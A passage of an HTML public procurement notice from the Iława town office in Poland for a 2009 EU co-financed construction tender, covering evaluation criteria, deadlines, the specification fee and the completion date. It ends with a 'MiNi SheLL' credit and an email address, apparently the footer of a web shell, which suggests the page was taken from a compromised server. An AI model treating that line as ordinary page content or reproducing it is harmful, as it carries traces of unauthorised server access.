7.4	W przypadku wykonawców spoza terytorium Rzeczpospolitej Polskiej zamiast zaświadczenia o przynależności do Izby Inżynierów Budownictwa wykonawca przedstawia przynależność do właściwej izby branżowej na terenie kraju, z którego pochodzi, jeżeli w danym kraju ustawy nakładają na niego taki obowiązek.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> stronie https://ilawa-um.bip-wm.pl/public/ w zakładce zamówienia publiczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Iława, ul. Niepodległości 13, 14-200 Iława, pok.217.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2009 godzina 10:30, miejsce: Urząd Miasta Iława, ul. Niepodległości 13, 14-200 Iława, pok.217.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1). Zadanie jest przewidziane jest do współfinansowania w ramach REGIONALNEGO PROGRAMU OPERACYJNEGO WARMIA MAZURY NA LATA 2007-2013 ze środków Europejskiego Funduszu Rozwoju Regionalnego Unii Europejskiej w ramach osi priorytetowej 2 - Turystyka. Działanie 2.1 Wzrost potencjału turystycznego, poddziałanie 2.1.3 Infrastruktura sportowo-rekreacyjna, 
2) Cena za papierową wersję SIWZ wraz z załącznikami wynosi 550,00 PLN brutto. Sposób zapłaty: przelewem na konto zamawiającego nr 02116022020000000070452838, lub gotówką w kasie zamawiającego: w poniedziałek od 08.00-16.00, wtorek do piątku od 08.00- 14.00
Dotyczy termin realizacji:
1.	Termin rozpoczęcia realizacji przedmiotu zamówienia - 5 dni od dnia przekazania placu budowy. 
2.	Zakończenie realizacji przedmiotu zamówienia - wymagany termin zakończenia zadania do dnia 30.09 2010r. 
3.	Zamawiający przekaże Wykonawcy plac budowy: na wniosek Wykonawcy robót, nie później niż 
w ciągu 5 dni od daty złożenia wniosku przez Wykonawcę. Wykonawca zobowiązany jest złożyć wniosek o przekazanie placu budowy nie później niż w ciągu 3 dni od podpisania umowy.
4.	Termin zakończenia realizacji zadania jest terminem przekazania wykonanych prac wraz z kompletem wszystkich dokumentów potrzebnych do oddania inwestycji i obiektu w użytkowanie.

Creat By MiNi SheLL
Email: jattceo@gmail.com